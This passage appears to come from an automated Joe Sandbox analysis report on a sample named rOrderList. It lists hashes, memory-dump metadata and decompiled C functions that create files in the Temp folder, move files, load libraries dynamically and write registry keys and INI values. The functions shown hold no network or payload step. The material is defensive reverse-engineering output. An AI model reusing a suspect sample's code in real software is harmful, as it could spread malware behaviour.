                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 2831762973-0
                                                                                      • Opcode ID: 3753f7d7f26b796998781e4facb4b7deeb9821a2adc5ab8ce6bf6554a4863c5d
                                                                                      • Instruction ID: 0eea939cfefa250e45086769c78755c0b3bfdf1c9c70056638625836d9ad0d91
                                                                                      • Opcode Fuzzy Hash: 3753f7d7f26b796998781e4facb4b7deeb9821a2adc5ab8ce6bf6554a4863c5d
                                                                                      • Instruction Fuzzy Hash: FFF06232A00120ABDB10AFA89A4DAAE73A5AF44314F12443FE651B71C1DAFC5D01563E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: cd0955575ac35327a86a57b7ea29a354a891b948559101ff756e948a89d9e921
                                                                                      • Instruction ID: 48959857ec3f5b0c379144f7296e67114b3b5caedf6fbb426f3b5d99425d3ae6
                                                                                      • Opcode Fuzzy Hash: cd0955575ac35327a86a57b7ea29a354a891b948559101ff756e948a89d9e921
                                                                                      • Instruction Fuzzy Hash: B1E09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE801F20C2CBB85C00862E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00401573(void* __ebx) {
                                                                                      				int _t4;
                                                                                      				void* _t9;
                                                                                      				struct HWND__* _t11;
                                                                                      				struct HWND__* _t12;
                                                                                      				void* _t16;
                                                                                      
                                                                                      				_t9 = __ebx;
                                                                                      				_t11 =  *0x429230;
                                                                                      				if(_t11 != __ebx) {
                                                                                      					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
                                                                                      					_t4 =  *(_t16 - 0x30);
                                                                                      				}
                                                                                      				_t12 =  *0x429244;
                                                                                      				if(_t12 != _t9) {
                                                                                      					ShowWindow(_t12, _t4); // executed
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t16 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00401573
                                                                                      0x00401573
                                                                                      0x00401581
                                                                                      0x00401587
                                                                                      0x00401589
                                                                                      0x00401589
                                                                                      0x0040158c
                                                                                      0x00401594
                                                                                      0x0040159c
                                                                                      0x0040159c
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: acc70c6f29d20ec2e0522a8a59fc4d0c048a143266ea016b0e5a54e905789e50
                                                                                      • Instruction ID: 68d2f30391901d1d9ba62db1430854f87f0e26d751f15bb82e1089b222079e22
                                                                                      • Opcode Fuzzy Hash: acc70c6f29d20ec2e0522a8a59fc4d0c048a143266ea016b0e5a54e905789e50
                                                                                      • Instruction Fuzzy Hash: 2AE0BF76B20114ABCB14DFA8ED9086E77B5EB54310760487AE902B3290C675AC11CB78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406931(signed int _a4) {
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      				signed int _t10;
                                                                                      
                                                                                      				_t10 = _a4 << 3;
                                                                                      				_t8 =  *(_t10 + 0x40a410);
                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                      				if(_t5 != 0) {
                                                                                      					L2:
                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                      				}
                                                                                      				_t5 = E004068C1(_t8); // executed
                                                                                      				if(_t5 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				goto L2;
                                                                                      			}





                                                                                      0x00406939
                                                                                      0x0040693c
                                                                                      0x00406943
                                                                                      0x0040694b
                                                                                      0x00406957
                                                                                      0x00000000
                                                                                      0x0040695e
                                                                                      0x0040694e
                                                                                      0x00406955
                                                                                      0x00000000
                                                                                      0x00406966
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                                                        • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                                                                        • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                                                                                        • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
                                                                                      • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                                                                                      • Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
                                                                                      • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00406032(WCHAR* _a4, long _a8, long _a12) {
                                                                                      				signed int _t5;
                                                                                      				void* _t6;
                                                                                      
                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                      				return _t6;
                                                                                      			}





                                                                                      0x00406036
                                                                                      0x00406043
                                                                                      0x00406058
                                                                                      0x0040605e

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                      • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                      • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                      • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040600D(WCHAR* _a4) {
                                                                                      				signed char _t3;
                                                                                      				signed char _t7;
                                                                                      
                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                      				_t7 = _t3;
                                                                                      				if(_t7 != 0xffffffff) {
                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00406012
                                                                                      0x00406018
                                                                                      0x0040601d
                                                                                      0x00406026
                                                                                      0x00406026
                                                                                      0x0040602f

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405AF0(WCHAR* _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                      				if(_t2 == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}




                                                                                      0x00405af6
                                                                                      0x00405afe
                                                                                      0x00000000
                                                                                      0x00405b04
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                                                                                      • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                      • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                                                                                      • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                      • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E0040167B() {
                                                                                      				int _t7;
                                                                                      				void* _t13;
                                                                                      				void* _t15;
                                                                                      				void* _t20;
                                                                                      
                                                                                      				_t18 = E00402D3E(0xffffffd0);
                                                                                      				_t16 = E00402D3E(0xffffffdf);
                                                                                      				E00402D3E(0x13);
                                                                                      				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                      				if(_t7 == 0) {
                                                                                      					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040689A(_t18) == 0) {
                                                                                      						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                      					} else {
                                                                                      						E00406302(_t15, _t18, _t16);
                                                                                      						_push(0xffffffe4);
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_push(0xffffffe3);
                                                                                      					L5:
                                                                                      					E00401423();
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t20 - 4));
                                                                                      				return 0;
                                                                                      			}







                                                                                      0x00401684
                                                                                      0x0040168d
                                                                                      0x0040168f
                                                                                      0x00401696
                                                                                      0x0040169e
                                                                                      0x004016aa
                                                                                      0x00402925
                                                                                      0x004016be
                                                                                      0x004016c0
                                                                                      0x004016c5
                                                                                      0x00000000
                                                                                      0x004016c5
                                                                                      0x004016a0
                                                                                      0x004016a0
                                                                                      0x004022e9
                                                                                      0x004022e9
                                                                                      0x004022e9
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: ca598f01870ae34eccd880849d71d37fbd47e21ac257f25a9de2b30882e69ac1
                                                                                      • Instruction ID: 7206a17c4d5fce065d1639f2aed3a35bc4cb39007168cc9cbc0cfc9d8a61edfe
                                                                                      • Opcode Fuzzy Hash: ca598f01870ae34eccd880849d71d37fbd47e21ac257f25a9de2b30882e69ac1
                                                                                      • Instruction Fuzzy Hash: F4F0543160411497CB10AFB68F0DD5F33649F52328F254A3FB421B21D1D6FD8942556F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004023AA(int __eax, WCHAR* __ebx) {
                                                                                      				WCHAR* _t11;
                                                                                      				WCHAR* _t13;
                                                                                      				void* _t17;
                                                                                      				int _t21;
                                                                                      
                                                                                      				_t11 = __ebx;
                                                                                      				_t5 = __eax;
                                                                                      				_t13 = 0;
                                                                                      				if(__eax != __ebx) {
                                                                                      					__eax = E00402D3E(__ebx);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                      					_t13 = E00402D3E(0x11);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                      					_t11 = E00402D3E(0x22);
                                                                                      				}
                                                                                      				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402D3E(0xffffffcd)); // executed
                                                                                      				_t21 = _t5;
                                                                                      				if(_t21 == 0) {
                                                                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t17 - 4));
                                                                                      				return 0;
                                                                                      			}







                                                                                      0x004023aa
                                                                                      0x004023aa
                                                                                      0x004023ac
                                                                                      0x004023b0
                                                                                      0x004023b3
                                                                                      0x004023b8
                                                                                      0x004023bd
                                                                                      0x004023c6
                                                                                      0x004023c6
                                                                                      0x004023cb
                                                                                      0x004023d4
                                                                                      0x004023d4
                                                                                      0x004023e1
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                      • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                                                                                      • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                      • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004063D7(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E0040632E(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}






                                                                                      0x004063e1
                                                                                      0x004063ea
                                                                                      0x00406400
                                                                                      0x00000000
                                                                                      0x00406400
                                                                                      0x004063ee
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 00406400
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
